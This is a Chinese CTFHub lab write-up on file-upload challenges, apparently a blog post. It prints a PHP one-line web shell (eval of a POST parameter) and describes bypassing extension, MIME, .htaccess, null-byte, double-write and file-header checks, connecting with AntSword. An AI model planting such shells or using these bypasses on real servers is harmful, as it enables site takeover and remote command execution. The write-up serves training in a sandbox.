ctfhub文件上传

⽆验证

上传⼀句话⽊⻢,发现上传成功

复制代码
1.php ⼀句话⽊⻢内容:
<?php @eval($_POST[cmd]);?>

上传⼀句话⽊⻢,发现上传成功

复制代码
http://challenge-8b27d18368ecc25c.sandbox.ctfhub.com:10800/upload/1.ph
p

前端验证

开启题⽬

上传⼀个 1.jpg,内容是

复制代码
<?php @eval($_POST[cmd]);?>

上传抓包,修改后缀为 php

放包,上传成功

蚁剑连接

复制代码
http://challenge-3c592a81e5b9e7a6.sandbox.ctfhub.com:10800/upload/1.ph
p

在/var/www/html/flag_2925720673.php找到flag

.htaccess

先上传.htaccess

再上传1.jpg

蚁剑连接

注意是1.jpg不是1.php

复制代码
http://challenge-dc29f7e0bd8df3ff.sandbox.ctfhub.com:10800/upload/1.jpg

得到flag

MIME 绕过

上传2.jpg抓包修改为2.php

蚁剑连接

00 截断

上传2.php抓包并修改成如下图所示

蚁剑连接

双写绕过

抓包修改成如下所示

蚁剑连接

⽂件头检测

命令行以管理员身份运行

png照片可截图获得,不可通过改文件后缀获得

且必须在文件所在目录下

复制代码
copy 2.png/b + 2.php/a 3.png

上传3.png并抓包修改

蚁剑连接

相关推荐
零零信安14 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
憧憬成为web高手14 天前
l33t-hoster
学习·web安全·网络安全
HackTwoHub14 天前
Sqli-Scanner SQL注入SKILL自动化挖掘SQL注入,零依赖自动化SQL注入挖掘,赏金猎人
数据库·人工智能·sql·web安全·网络安全·自动化·系统安全
爱网络爱Linux14 天前
网络安全与渗透测试实用工具大全
web安全·网络安全·信息安全·cisp-pte·cisp·cissp
xsc-xyc14 天前
用 Tailscale + Syncthing 实现手机、电脑与 NAS 的跨网络文件同步
linux·网络·网络安全·智能手机·电脑
持敬chijing14 天前
Web渗透之SQL注入-常用sql语句
sql·安全·web安全·网络安全
Chengbei1114 天前
AISec真正拟人化全自动渗透工具!支持浏览器交互全自动化挖掘,SQL注入、XSS、越权等。
sql·安全·web安全·网络安全·自动化·系统安全·xss
X7x514 天前
深度拆解网络安全“闭环”之王——APPDRR模型
网络安全·网络攻击模型·安全威胁分析·安全架构·appdrr模型
Inhand陈工14 天前
污水泵站PLC数据上云实战:西门子PLC + 映翰通IG502 + DM平台全流程
人工智能·物联网·网络安全·阿里云·信息与通信·iot
X7x514 天前
一文讲透PADIMEE模型
网络安全·网络攻击模型·安全威胁分析·安全架构·padimee模型